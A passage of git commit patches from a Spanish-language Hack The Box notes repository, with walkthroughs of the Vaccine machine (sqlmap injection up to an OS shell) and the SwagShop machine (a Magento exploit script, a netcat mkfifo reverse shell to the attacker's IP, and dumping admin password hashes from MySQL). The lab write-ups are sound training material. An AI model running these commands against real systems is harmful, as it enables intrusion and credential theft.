--- /dev/null
+++ b/Herramientas_y_Scripts/FFUF.md
@@ -0,0 +1,3 @@
+# FUFF
+
+FFUF es un rápido fuzzer web escrito en Go. Es un método profesional de línea de comandos para el fuzzing web en un servidor web.
From b8169a7302c3f188f0370426a4ee8948e6a78185 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Wed, 4 May 2022 09:39:27 +0200
Subject: [PATCH 0197/1701] Create Maquinas-HTB.md
---
Maquinas-HTB/Maquinas-HTB.md | 3 +++
1 file changed, 3 insertions(+)
create mode 100644 Maquinas-HTB/Maquinas-HTB.md
diff --git a/Maquinas-HTB/Maquinas-HTB.md b/Maquinas-HTB/Maquinas-HTB.md
new file mode 100644
index 00000000000..f56e1cea77e
--- /dev/null
+++ b/Maquinas-HTB/Maquinas-HTB.md
@@ -0,0 +1,3 @@
+# Maquinas de Hack The Box:
+
+[Forge](./Maquinas-HTB/Maquinas-HTB.md)
From 07698ed773ff1d1bdcf4d73aaff64589c2cc713d Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Wed, 4 May 2022 09:41:37 +0200
Subject: [PATCH 0198/1701] Create Forge.md
---
Maquinas-HTB/Forge.md | 1 +
1 file changed, 1 insertion(+)
create mode 100644 Maquinas-HTB/Forge.md
diff --git a/Maquinas-HTB/Forge.md b/Maquinas-HTB/Forge.md
new file mode 100644
index 00000000000..13aab73aadf
--- /dev/null
+++ b/Maquinas-HTB/Forge.md
@@ -0,0 +1 @@
+# Maquina Forge
From 415e6bcddf1261b7689209cf0a3533b8e69a7eec Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Wed, 4 May 2022 10:45:59 +0200
Subject: [PATCH 0199/1701] Update HTB-Vaccine.md
---
Starting Point/HTB-Vaccine.md | 28 +++++++++++++++++++++++++++-
1 file changed, 27 insertions(+), 1 deletion(-)
diff --git a/Starting Point/HTB-Vaccine.md b/Starting Point/HTB-Vaccine.md
index 0d79961c6ac..e8410b114a7 100644
--- a/Starting Point/HTB-Vaccine.md
+++ b/Starting Point/HTB-Vaccine.md
@@ -305,6 +305,8 @@ Para crear el archivo:
echo 'Número de Hash' > hash2
+ 
+
En caso de no tener instalado HashCat:
sudo apt install hashcat
@@ -325,6 +327,14 @@ hash2 : Nombre del archivo que contiene el hash que queremos descifrar.
rockyou.txt : Es un diccionario con más de 14 millones de contraseñas y hashes.
+
+
+Nos indica que ha encontradoalgo y que utilizemos `--show` para poder visualizarlo.
+
+ hashcat --show hash2
+
+
+
Como podemos ver, Hashcat descifró la contraseña: qwerty789
@@ -333,6 +343,8 @@ Como podemos ver, Hashcat descifró la contraseña: qwerty789
Ya conocemos un usuario `admin` y una contraseña `qwerty789`, con esta información vamos a volver a la página web donde nos
aparecia una pagina de inicio de sesión y vamos a tratar de acceder utilizando estos datos.
+
+
Genial, podemos ver como tenemos acceso como el usuaio `admin`.
Tras revisar el contenido de la página, vemos como el tablero no reporta nada especial, sin embargo, nos muestra un catálogo que
@@ -340,8 +352,22 @@ podría estar conectado con la base de datos.
Vamos a tratar de realizar algunas consultas y ver que ocurre:
+
+
Al verificar la URL, podemos ver que hay una variable `$search` que es responsable de buscar en el catálogo.
+
+
+Intentemos forzar un error en la URL a ver que nos reporta, para ello simplemente quitaremos una comilla de la URL:
+
+
+
+
+
+Vemos como al tener una sintaxis erronea, nos repotar el siguiente mensaje:
+
+
+
Tras ver esto, vamos a probar si es vulnerable a una inyeccion SQL, se puede hacer manualmente, pero para facilitarnos el trabajo
usaremos una herramienta llamada `Sqlmap`.
@@ -350,7 +376,7 @@ usaremos una herramienta llamada `Sqlmap`.
SQLmap es una herramienta de código abierto utilizada en pruebas de penetración para detectar y explotar fallas de inyección SQL. SQLmap automatiza
el proceso de detección y explotación de inyección SQL. Los ataques de inyección de SQL pueden tomar el control de las bases de datos que utilizan SQL.
-Viene preinstalado con Parrot OS y Kali Linux, sin embargo, puede instalarlo a través del repositorio si no lo tiene:
+Viene preinstalado con Parrot OS y Kali Linux, sin embargo, puede instalarlo a través del repositorio o con el siguiente comando:
sudo apt install sqlmap
From f21157e3a52132c843b5b36daca34d7bc1635e2e Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Wed, 4 May 2022 21:31:38 +0200
Subject: [PATCH 0200/1701] Update HTB-Vaccine.md
---
Starting Point/HTB-Vaccine.md | 69 ++++++++++++++++++++++++++++++++++-
1 file changed, 68 insertions(+), 1 deletion(-)
diff --git a/Starting Point/HTB-Vaccine.md b/Starting Point/HTB-Vaccine.md
index e8410b114a7..a4718e00f62 100644
--- a/Starting Point/HTB-Vaccine.md
+++ b/Starting Point/HTB-Vaccine.md
@@ -380,7 +380,74 @@ Viene preinstalado con Parrot OS y Kali Linux, sin embargo, puede instalarlo a t
sudo apt install sqlmap
+Una vez tenemos SQLmap instalado vamos a ejecutarlo. Para ello en primer lugar unicamente especificaremos la `url`.
+
+ sqlmap --url "10.129.25.145/dashboard.php?search="
+Como podeís ver no nos muestra nada interesante utilizando solo la URL.
+Tambien nos muestra que no tenemos unas cookies de sesión definidas. Como
+ya estamos registrados como el usuario `admin` podemos utilizar sus credenciales de las cookies de inicio de sesión.
+
+Para ello volvemos a firefox y mediante `cntrl + shift + c` o clic derecho e Inspeccionar se nos abrirá una pestaña. Dentro de la pestaña vamos hasta
+`Almacenamiento` y luego `Cookies`. Vemos como nos muestra un `Nombre` y un `Valor`, vamos a copiarlos y utilizarlos con `SQLmap`.
+
+
+
+
+
+Ahora especificaremos los datos de inicio de sesión de las cookies en el comando anterior, esto lo haremos mediante la variable `--cookie`, tambien vamos a especificar mediante `--batch` que automatice todo el proceso sin necesidad de que nos pregunte que tareas realizar.
+
+Y lo más importante, lo que queremos buscar mediante el escaneo, en nuestro caso vamos a tratar de enumerar los archivos de la base detos mediante
+la variable `--current-db`.
+
+ sqlmap --current-db --url "http://10.129.25.145/dashboard.php?search=Elixir" --cookie="PHPSESSID=dcep13le13prvgcl8ub8cqgjva" --batch
+
+
+
+
+
+Podemos ver como nos reporta que el nombre de la base de datos es `public`.
+
+Conociendo el nombre de la base de datos, mediante sqlmap vamos a tratar de numerar las tablas de la sbase de datos `public`:
+
+ sqlmap -D public --tables --url "http://10.129.25.145/dashboard.php?search=Elixir" --cookie="PHPSESSID=dcep13le13prvgcl8ub8cqgjva" --batch
+
+`-D` : Indica que vamos a especificar una base de datos. En nuestro caso `public`.
+
+`--tables` : Está variable nos reportará las tablas de las base de datos que hemos especificado.
+
+
+
+
+
+Sqlmap nos muestra que dentro de la base de datos `public` existe una tabla llamada `cars`.
+
+Nuevamente realizaremos otro escaneo especificando la tabla cars:
+
+ sudo sqlmap -D public -T cars --columns --url "http://10.129.25.145/dashboard.php?search=Elixir" --cookie="PHPSESSID=dcep13le13prvgcl8ub8cqgjva" --batch
-
+`-T` : Indica que vamos a especificar las tablas. En nuestro caso `cars`.
+
+`--columns` : Nos reporta las columnas de la tabla especificada.
+
+
+
+
+
+Genial, vemos como nos a reportado la siguiente tabla:
+
+
+
+Está tabla tampoco parece reportar nada innteresante así que trataremos de crear mediante Sqlmap una Shell interactiva.
+
+Para ello utilizaremos la siguiente variable de Sqlmap:
+
+ sudo sqlmap --os-shell --url "http://10.129.25.145/dashboard.php?search=Elixir" --cookie="PHPSESSID=dcep13le13prvgcl8ub8cqgjva"
+
+
+
+
+
+Ya tenemos nuestra shell activa, vamos a investigar un poco para ver que
+archivos contiene. Primero mediante `ls` vamos a ver que tenemos en el directorio en el que nos encontramos.
From bdae3fec50a7df64ea6f57bbab0d464dfb600aa1 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Thu, 5 May 2022 00:37:21 +0200
Subject: [PATCH 0201/1701] Create HTB-SwagShop.md
---
Maquinas-HTB/HTB-SwagShop.md | 60 ++++++++++++++++++++++++++++++++++++
1 file changed, 60 insertions(+)
create mode 100644 Maquinas-HTB/HTB-SwagShop.md
diff --git a/Maquinas-HTB/HTB-SwagShop.md b/Maquinas-HTB/HTB-SwagShop.md
new file mode 100644
index 00000000000..5031be15704
--- /dev/null
+++ b/Maquinas-HTB/HTB-SwagShop.md
@@ -0,0 +1,60 @@
+
+
+
+# SwagShop
+
+En primer luegar nos creamos un directorio con el nombre de la máquina desde el que trabajaremos:
+
+ sudo mkdir SwagShop
+
+Ahora mediante la función `mkt` que tengo previamente definida en la `zhshrc` crearemos nuestros directorio de trabajo:
+
+ sudo mkt
+
+Realizamos un `ping` y vemos como nos reporta un ttl=63, por tanto ya sabemos que estamos frente una máquina Linux.
+
+ ping -c 1 10.10.10.140
+
+
+
+
+Ahora mediante `nmap` realizaremos un escaneo de puertos:
+
+ nmap -p- --open -sS --min-rate 5800 -vvv -n -Pn 10.10.10.140 -oG allPorts2
+
+
+
+Vemos como nos reporta el puerto 80 y el puerto 20.
+
+
+
+Intentamos ver el dominio `http://10.10.10.140/` y vemos como nos redirige hasta `swagshop.htb` pero no nos permite ver la página. Para ello vamos
+a registrar el dominio en nuestra carpeta `/etc/hosts` e introducimos la Ip de la máquina víctima y el host `swagshop.htb`:
+
+
+
+
+
+
+
+ sudo nano /etc/hosts
+
+
+
+ 
+
+Ahora volvemos a nuestro buscador y vemos como ya nos muestra la página.
+
+
+
+Pasamos a revisar la página.
+
+ gobuster dir -u http://10.10.10.140 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
+
+
+ sudo searchsploit -m xml/webapps/37977.py
+
+
+
+
+
From e07529602a767b9be0791104f96e59c560d54033 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Thu, 5 May 2022 00:38:13 +0200
Subject: [PATCH 0202/1701] Rename Forge.md to HTB-Forge.md
---
Maquinas-HTB/{Forge.md => HTB-Forge.md} | 0
1 file changed, 0 insertions(+), 0 deletions(-)
rename Maquinas-HTB/{Forge.md => HTB-Forge.md} (100%)
diff --git a/Maquinas-HTB/Forge.md b/Maquinas-HTB/HTB-Forge.md
similarity index 100%
rename from Maquinas-HTB/Forge.md
rename to Maquinas-HTB/HTB-Forge.md
From dc3713c2120eef31d04dde5a8a23e1d705d92e4c Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Thu, 5 May 2022 03:37:46 +0200
Subject: [PATCH 0203/1701] Update HTB-SwagShop.md
---
Maquinas-HTB/HTB-SwagShop.md | 169 ++++++++++++++++++++++++++++++++++-
1 file changed, 166 insertions(+), 3 deletions(-)
diff --git a/Maquinas-HTB/HTB-SwagShop.md b/Maquinas-HTB/HTB-SwagShop.md
index 5031be15704..b3688cc1dc7 100644
--- a/Maquinas-HTB/HTB-SwagShop.md
+++ b/Maquinas-HTB/HTB-SwagShop.md
@@ -9,7 +9,9 @@ En primer luegar nos creamos un directorio con el nombre de la máquina desde el
Ahora mediante la función `mkt` que tengo previamente definida en la `zhshrc` crearemos nuestros directorio de trabajo:
- sudo mkt
+ sudo mkt
+
+### PING
Realizamos un `ping` y vemos como nos reporta un ttl=63, por tanto ya sabemos que estamos frente una máquina Linux.
@@ -17,6 +19,21 @@ Realizamos un `ping` y vemos como nos reporta un ttl=63, por tanto ya sabemos qu

+Ahora vamos a ver mediante `whatweb` que más podemos ver:
+
+ whatweb 10.10.10.140
+
+
+
+Vemos que es un sistema Linux Apache 2.4.18 en el cual corre un servicio `http` el cual esta basado en `Magento`.
+
+### ¿Qué es Magento?
+
+Es una plataforma de comercio en línea, de código abierto (open source) y escrita en PHP, con la que puedes realizar todo tipo de proyectos relacionados a la creación de páginas web de venta en Internet.
+
+Es una herramienta para el diseño y desarrollo de tu tienda online, permitiéndote una gestión avanzada de distintas áreas, incluyendo el marketing y el posicionamiento web.
+
+### NMAP
Ahora mediante `nmap` realizaremos un escaneo de puertos:
@@ -47,14 +64,160 @@ Ahora volvemos a nuestro buscador y vemos como ya nos muestra la página.

-Pasamos a revisar la página.
+Pasamos a revisar la página. Como podemos ver la página es bastante funcional,se trata de una página de venta de productos de HTB, contiene varios enlaces y podemos ver como nos permite comprar y tratar de registranos
+
+### Gobuster
+
+En primer lugar, usando la herramienta `gobuster` vamos a tratar de realizar un escaneo genera en busca de alguna ruta que no se nos muestre en la página.
+
+En caso de no tener la herramienta la instalamos:
+
+ sudo apt install gobuster
+
+Para ello especificaremos el dominio de la víctima y el diccionario de rutas que vamos a utilizar. En este caso vamos a utilizar un diccionario llamado `directory-list-2.3-medium.txt` en cual es parte del repositorio `seclists`
+
+Para descargar el repositorio:
+
+ sudo apt install seclists
+
+Ya tenemos `gobuster` y el repositorio `seclists`, ahora procederemos con el escaneo:
gobuster dir -u http://10.10.10.140 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
+`dir` : Se utiliza para especificar la opción de directorios.
+
+`-u` : Se utiliza para especificar una `url`.
+
+`-w` : Especifica el diccionario que vamos a utilizar.
+
+
+
+Podemos ver que nos reporta una serie de directorios. Tras revisarlos, veo que el directorio `app` contiene otros directorios.
+
+
+
+Esto podemos confirmarlo
+volviendo a pasar el `gobuster` e incluyendo el directio `app` en la url.
+
+
+
+Vamos a tratar de acceder al directorio `app` desde el navegador.
+
+
+
+Tras ir revisando los directirios, encontramos que dentro de `etc/` en el
+archivo `local.xml` econtramos una credenciales.
+
+
+
+
+
+Vemos como nos reporta un username como `root` y una password:
+
+
+
+Guardaremos esta información en caso de que nos sea util más tarde. Ahora vamos a tratar de generar una reverse shell. Buscando reportes de vulnerabilidades sobre Magento, encuentro en github la siguiente herramienta
+escrita en python3, la cual nos permite crear una reverse shell en paginas creadas con Magento. Para ello la herramienta nos registra automaticamente con el nombre y contraseña que le proporcionemos. Por defecto nos define
+`str` tanto como usuario como contraseña.
+
+Para descargar la herramienta en nuesto dierectorio actual:
+
+ wget https://raw.githubusercontent.com/epi052/htb-scripts-for-retired-boxes/master/swagshop/magento-oneshot.py
+
+Ahora tenemos que darle permiso de ejecución:
+
+ sudo chmod +x magento-oneshot.py
+
+Ya tenemos nuestra herramienta preparada, ahora solo debemos especificar el host de la víctima `http://swagshop.htb/index.php` y el comando que queramos ejecutar:
+
+ python3 magento-oneshot.py --command whoami http://swagshop.htb/index.php
+
+`--command` : Se usa para especificar un comando. En nuestro caso `whoami`.
+
+
+
+Vemos como funciona perfectamente y como nos reconoce como `www-data`.
+
+Desde aquí ya podriamos hacer cositas, reportando distintos comando podríamos
+ir interacuando con el sistema pero no es practico. Para poder trabajar bien
+vamos a tratar de montar una shell mñas cómoda.
+
+Para ello vamos a ver primero si disponemos de `netcat` para tratar de establer una reverse shell:
+
+ python3 magento-oneshot.py --command "wich nc" http://swagshop.htb/index.php
+
+Vemos que si disponemos de netcat. Ahora vamos a tratar de establecer una
+reverse shell. En el siguiente enlace, podreis ver una gran repertorio
+de herramientas desde las que establecer shells inversas.
+
+Nosotros vamos a utilizar la de Netcat:
+
+[https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet](https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet)
+
+
+
+Pimero preparamos en una terminal a parte, nuestro comando netcat `nc` en escucha por el puerto `8080`.
+
+ nc -lnvp 8080
+
+Finalmente especificamos el comando que nos reporta el artículo dentro de nuestro comando anterior, tambien especificamos nuestra Ip (En este caso es nuestra vpn de HTB) y el puerto desde el que nos pondremos en escucha, `8080`.
+
+
+ python3 magento-oneshot.py --command "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.29 8080 >/tmp/f" http://swagshop.htb/index.php
+
+Ya tenemos nuestro shell. Pero sigue sin ser funcional del todo. Para poder
+obtener una shell completa basada en bash, utilizamos los siguientes comandos:
+
+ script /dev/null -c bash
+
+Ahora pulsamos `Cntl + z` enviamos el proceso a segundo plano. Y ejecutamos lo siguiente:
+
+ stty raw -echo; fg
+
+Y terminamos reseteando la shell:
+
+ reset xterm
+
+Ahora ya tenemos una shell más estable y potente. Y buscando un poco, encontramos la primera flag.
+
+
+
+Ahora nos faltaría autentificarnos como `root`. Tras comprobar que no funcionan las credenciales previamente recopiladas para conectarnos de forma
+directa como `root`, vamos a tratar de utilizarlas para conectarnos mediante
+`mysql`.
+
+ mysql -uroot -p
+
+
+
+Genial, ahora vemos como la password conseguida anteriormente en la base de datos dentro del archivo `local.xml` nos permite conectarnos.
+
+Una vez dentro de `mysql` vamos a ver las bases de datos:
+
+ show databases;
+
+
+
+Vemos como existe una base de datos llamada como la máquina `swagsho`. Intentemos ver sus tablas. Para ello primero ingresamos a ella mediante `use`:
+
+ use swagshop;
+
+ 
+
+Y ahora visualizamos las tablas:
+
+ show tables;
+
+
+
+
+Vemos como se nos reportan un monton, pero una de las más interesantes es `admin_user`. Para ver mas información:
- sudo searchsploit -m xml/webapps/37977.py
+ describe admin_user;
+
+ das
From 8ec55654fb1382db94d7f50507084cb21d16978d Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Thu, 5 May 2022 08:46:32 +0200
Subject: [PATCH 0204/1701] Create mkt.md
---
Herramientas_y_Scripts/mkt.md | 32 ++++++++++++++++++++++++++++++++
1 file changed, 32 insertions(+)
create mode 100644 Herramientas_y_Scripts/mkt.md
diff --git a/Herramientas_y_Scripts/mkt.md b/Herramientas_y_Scripts/mkt.md
new file mode 100644
index 00000000000..9b2a20f06f1
--- /dev/null
+++ b/Herramientas_y_Scripts/mkt.md
@@ -0,0 +1,32 @@
+# Función MKT:
+
+Esta función está definida para crearnos cuatro directorios (`nmap`, `content`,
+`exploits` y `scripts`) desde los cuales poder trabajar a la hora de realizar
+las máquinas de HTB.
+
+
+
+
+ # Función para crear directorios:
+ function mkt(){
+ mkdir {nmap,content,exploits,scripts}
+ }
+
+
+
+
+
+Simplemente copiamos la función y la pegamos dentro del archivo `~/.zshrc`:
+
+ nano ~/.zshrc
+
+Pegamos la función. `Cntrl + o` para guardar y `Cntrl + x` para salir.
+
+Ahora para ejecutarlo, simplemente desde la carpeta en la que queramos crear
+los directorios de trabajo, usamos el comando `mtk`:
+
+ mtk
+
+
+
+
From 7f5cddeeec249208764c0f1ce49e65e929cb4da3 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Thu, 5 May 2022 08:58:30 +0200
Subject: [PATCH 0205/1701] Update HTB-SwagShop.md
---
Maquinas-HTB/HTB-SwagShop.md | 8 ++++++--
1 file changed, 6 insertions(+), 2 deletions(-)
diff --git a/Maquinas-HTB/HTB-SwagShop.md b/Maquinas-HTB/HTB-SwagShop.md
index b3688cc1dc7..640f1342db3 100644
--- a/Maquinas-HTB/HTB-SwagShop.md
+++ b/Maquinas-HTB/HTB-SwagShop.md
@@ -7,9 +7,14 @@ En primer luegar nos creamos un directorio con el nombre de la máquina desde el
sudo mkdir SwagShop
-Ahora mediante la función `mkt` que tengo previamente definida en la `zhshrc` crearemos nuestros directorio de trabajo:
+Ahora mediante la función [`mkt`](../Herramientas_y_Scripts/mkt.html) que tengo previamente definida en la `zhshrc` crearemos nuestros directorio de trabajo:
sudo mkt
+
+Esta función está definida para crearnos cuatro directorios (`nmap`, `content`, `exploits` y `scripts`) desde los cuales poder trabajar a la hora de
+realizar las máquinas de HTB.
+
+
### PING
@@ -218,6 +223,5 @@ Vemos como se nos reportan un monton, pero una de las más interesantes es `admi

- das
From 2c85954a0c7c1a9e641c7be517d1c717c01b89a1 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Thu, 5 May 2022 09:04:25 +0200
Subject: [PATCH 0206/1701] Update HTB-SwagShop.md
---
Maquinas-HTB/HTB-SwagShop.md | 2 ++
1 file changed, 2 insertions(+)
diff --git a/Maquinas-HTB/HTB-SwagShop.md b/Maquinas-HTB/HTB-SwagShop.md
index 640f1342db3..e35f1a6a488 100644
--- a/Maquinas-HTB/HTB-SwagShop.md
+++ b/Maquinas-HTB/HTB-SwagShop.md
@@ -169,6 +169,8 @@ Finalmente especificamos el comando que nos reporta el artículo dentro de nuest
python3 magento-oneshot.py --command "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.29 8080 >/tmp/f" http://swagshop.htb/index.php
+
+
Ya tenemos nuestro shell. Pero sigue sin ser funcional del todo. Para poder
obtener una shell completa basada en bash, utilizamos los siguientes comandos:
From d9a4cb4fabc4052ec43142652f97a2f7c1f45d76 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Thu, 5 May 2022 09:47:42 +0200
Subject: [PATCH 0207/1701] Update HTB-SwagShop.md
---
Maquinas-HTB/HTB-SwagShop.md | 66 +++++++++++++++++++++++++++++++++---
1 file changed, 61 insertions(+), 5 deletions(-)
diff --git a/Maquinas-HTB/HTB-SwagShop.md b/Maquinas-HTB/HTB-SwagShop.md
index e35f1a6a488..fd2e6f7ceaa 100644
--- a/Maquinas-HTB/HTB-SwagShop.md
+++ b/Maquinas-HTB/HTB-SwagShop.md
@@ -161,40 +161,96 @@ Nosotros vamos a utilizar la de Netcat:

-Pimero preparamos en una terminal a parte, nuestro comando netcat `nc` en escucha por el puerto `8080`.
+Pimero preparamos en una terminal a parte, con nuestro comando netcat `nc` en escucha por el puerto `8080`.
nc -lnvp 8080
+
+ 
Finalmente especificamos el comando que nos reporta el artículo dentro de nuestro comando anterior, tambien especificamos nuestra Ip (En este caso es nuestra vpn de HTB) y el puerto desde el que nos pondremos en escucha, `8080`.
-
python3 magento-oneshot.py --command "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.29 8080 >/tmp/f" http://swagshop.htb/index.php

-Ya tenemos nuestro shell. Pero sigue sin ser funcional del todo. Para poder
-obtener una shell completa basada en bash, utilizamos los siguientes comandos:
+Ya tenemos nuestro shell. Pero sigue sin ser funcional del todo.
+
+
+
+Para poder obtener una shell completa basada en bash, utilizamos los siguientes comandos:
script /dev/null -c bash
+
+ 
Ahora pulsamos `Cntl + z` enviamos el proceso a segundo plano. Y ejecutamos lo siguiente:
+
+
+
+Ejecutamos el siguiente comando:
stty raw -echo; fg
+
+
+
Y terminamos reseteando la shell:
reset xterm
-Ahora ya tenemos una shell más estable y potente. Y buscando un poco, encontramos la primera flag.
+ 
+
+Ahora ya tenemos una shell más estable y potente. Tambien podemos cerrar la terminal de escucha por `nc` ya que esta
+shell es independiente y no se nos caerá.
+
+Como vemos la shell nos permite utilizar `Cntrl + c` sin expulsarnos pero aún no nos permite utilizar `Cntrl + l` para
+limpiar la shell y si utilizamos un `nano`, vemos como tampoco aprovecha todo el monitor.
+
+
+
+Aún que con esta shell ya se podría realizar las tareas restantes perfectamente, voy a mostrar como solucionar estos dos pequeños inconvenientes y así tener la shell al 100% funcional.
+
+Para ello primero solucionaremos el problema del `Cntrl +l` de la siguiente manera, si realizamos un `echo $TERM` vemos que tiene el valor `dumb`
+y nosotros queremos que igual que nuestra shell, valga `xterm`:
+
+ echo $TERM
+
+Vemos como nos reporta `dump`. Para cambiarlo introducimos el siguiente comando:
+
+ TERM=xterm
+
+Ahora ya podremos limpiar la pantalla mediante `Cntrl + l`. Bien, ya solo falta regular el ancho y la altura de nuesta shell, para ello primero debemos
+conocer que medidas tiene nuestro monitor para porder ajustarlo, para verlo, abrimos una terminal nueva desde nuestros directorio e intruducimos:
+
+ stty size
+
+Copiamos los dos números. Ahora volvemos a la reverse shell y podemos ver mediante el mismo comando que las proporciones son mucho menores. Para ajustarlo ralizamos lo siguiente:
+
+ stty size
+
+ stty rows 36 columns 133
+
+ stty size
+
+Una vez tengamos todo ajustado, vamos a por las flags. Para conseguir la primera, simplemene nos dirigimos al directorio raiz:
+
+ cd /
+
+Y vamos a la carpeta `/home/haris` donde econtraremos el primer archivo `user.txt` con la primera flag.
+

+## Escalada de Privilegios.
+
Ahora nos faltaría autentificarnos como `root`. Tras comprobar que no funcionan las credenciales previamente recopiladas para conectarnos de forma
directa como `root`, vamos a tratar de utilizarlas para conectarnos mediante
`mysql`.
mysql -uroot -p
+
+

Genial, ahora vemos como la password conseguida anteriormente en la base de datos dentro del archivo `local.xml` nos permite conectarnos.
From c906396f55795c749eba38a7a61d717fc6170755 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Thu, 5 May 2022 09:54:30 +0200
Subject: [PATCH 0208/1701] Update HTB-SwagShop.md
---
Maquinas-HTB/HTB-SwagShop.md | 34 ++++++++++++++++++++++++----------
1 file changed, 24 insertions(+), 10 deletions(-)
diff --git a/Maquinas-HTB/HTB-SwagShop.md b/Maquinas-HTB/HTB-SwagShop.md
index fd2e6f7ceaa..3d59cc00d54 100644
--- a/Maquinas-HTB/HTB-SwagShop.md
+++ b/Maquinas-HTB/HTB-SwagShop.md
@@ -206,42 +206,56 @@ shell es independiente y no se nos caerá.
Como vemos la shell nos permite utilizar `Cntrl + c` sin expulsarnos pero aún no nos permite utilizar `Cntrl + l` para
limpiar la shell y si utilizamos un `nano`, vemos como tampoco aprovecha todo el monitor.
-
-
Aún que con esta shell ya se podría realizar las tareas restantes perfectamente, voy a mostrar como solucionar estos dos pequeños inconvenientes y así tener la shell al 100% funcional.
Para ello primero solucionaremos el problema del `Cntrl +l` de la siguiente manera, si realizamos un `echo $TERM` vemos que tiene el valor `dumb`
y nosotros queremos que igual que nuestra shell, valga `xterm`:
echo $TERM
-
+
+ 
+
+
Vemos como nos reporta `dump`. Para cambiarlo introducimos el siguiente comando:
TERM=xterm
-
-Ahora ya podremos limpiar la pantalla mediante `Cntrl + l`. Bien, ya solo falta regular el ancho y la altura de nuesta shell, para ello primero debemos
-conocer que medidas tiene nuestro monitor para porder ajustarlo, para verlo, abrimos una terminal nueva desde nuestros directorio e intruducimos:
+
+
+
+
+Ahora ya podremos limpiar la pantalla mediante `Cntrl + l`. Bien, ya solo falta regular el ancho y la altura de nuesta
+shell, para ello primero debemos conocer que medidas tiene nuestro monitor para porder ajustarlo, para verlo, abrimos una terminal nueva desde nuestros directorio e intruducimos:
stty size
+
+
+
Copiamos los dos números. Ahora volvemos a la reverse shell y podemos ver mediante el mismo comando que las proporciones son mucho menores. Para ajustarlo ralizamos lo siguiente:
stty size
+
+
stty rows 36 columns 133
+
+
- stty size
+### Búsqueda de la primera Flag
-Una vez tengamos todo ajustado, vamos a por las flags. Para conseguir la primera, simplemene nos dirigimos al directorio raiz:
+Una vez tengamos todo ajustado, vamos a por las flags. Para conseguir la primera, simplemene nos dirigimos al directorio raiz `/`:
cd /
+
+
Y vamos a la carpeta `/home/haris` donde econtraremos el primer archivo `user.txt` con la primera flag.
+
-
+## Búsqueda de la segunda Flag
-## Escalada de Privilegios.
+# Escalada de Privilegios.
Ahora nos faltaría autentificarnos como `root`. Tras comprobar que no funcionan las credenciales previamente recopiladas para conectarnos de forma
directa como `root`, vamos a tratar de utilizarlas para conectarnos mediante
From 634c1736a2141512a1b996e554438ab472c6b823 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Thu, 5 May 2022 10:01:57 +0200
Subject: [PATCH 0209/1701] Update HTB-SwagShop.md
---
Maquinas-HTB/HTB-SwagShop.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/Maquinas-HTB/HTB-SwagShop.md b/Maquinas-HTB/HTB-SwagShop.md
index 3d59cc00d54..5ea38ad2aea 100644
--- a/Maquinas-HTB/HTB-SwagShop.md
+++ b/Maquinas-HTB/HTB-SwagShop.md
@@ -275,7 +275,7 @@ Una vez dentro de `mysql` vamos a ver las bases de datos:

-Vemos como existe una base de datos llamada como la máquina `swagsho`. Intentemos ver sus tablas. Para ello primero ingresamos a ella mediante `use`:
+Vemos como existe una base de datos llamada como la máquina `swagshop`. Intentemos ver sus tablas. Para ello primero ingresamos a ella mediante `use`:
use swagshop;
From cc3fa7eb44905e5254ca04b3b32ac7ba9ab2de91 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Thu, 5 May 2022 10:54:12 +0200
Subject: [PATCH 0210/1701] Update HTB-SwagShop.md
---
Maquinas-HTB/HTB-SwagShop.md | 47 ++++++++++++++++++++++++++++++++++--
1 file changed, 45 insertions(+), 2 deletions(-)
diff --git a/Maquinas-HTB/HTB-SwagShop.md b/Maquinas-HTB/HTB-SwagShop.md
index 5ea38ad2aea..5be322e95a7 100644
--- a/Maquinas-HTB/HTB-SwagShop.md
+++ b/Maquinas-HTB/HTB-SwagShop.md
@@ -257,8 +257,8 @@ Y vamos a la carpeta `/home/haris` donde econtraremos el primer archivo `user.tx
# Escalada de Privilegios.
-Ahora nos faltaría autentificarnos como `root`. Tras comprobar que no funcionan las credenciales previamente recopiladas para conectarnos de forma
-directa como `root`, vamos a tratar de utilizarlas para conectarnos mediante
+Ahora nos faltaría autentificarnos como `root`. Tras comprobar que no funcionan las credenciales previamente recopiladas en la base de datos mysql para conectarnos de forma
+directa como `root`, así que vamos a tratar de utilizarlas para conectarnos mediante
`mysql`.
mysql -uroot -p
@@ -291,9 +291,52 @@ Y ahora visualizamos las tablas:
Vemos como se nos reportan un monton, pero una de las más interesantes es `admin_user`. Para ver mas información:
describe admin_user;
+
+ 
+
+Vamos a ver que se nos reporta dentro de `username` y `password`:
+
+ select username,password from admin_user;
+
+
+
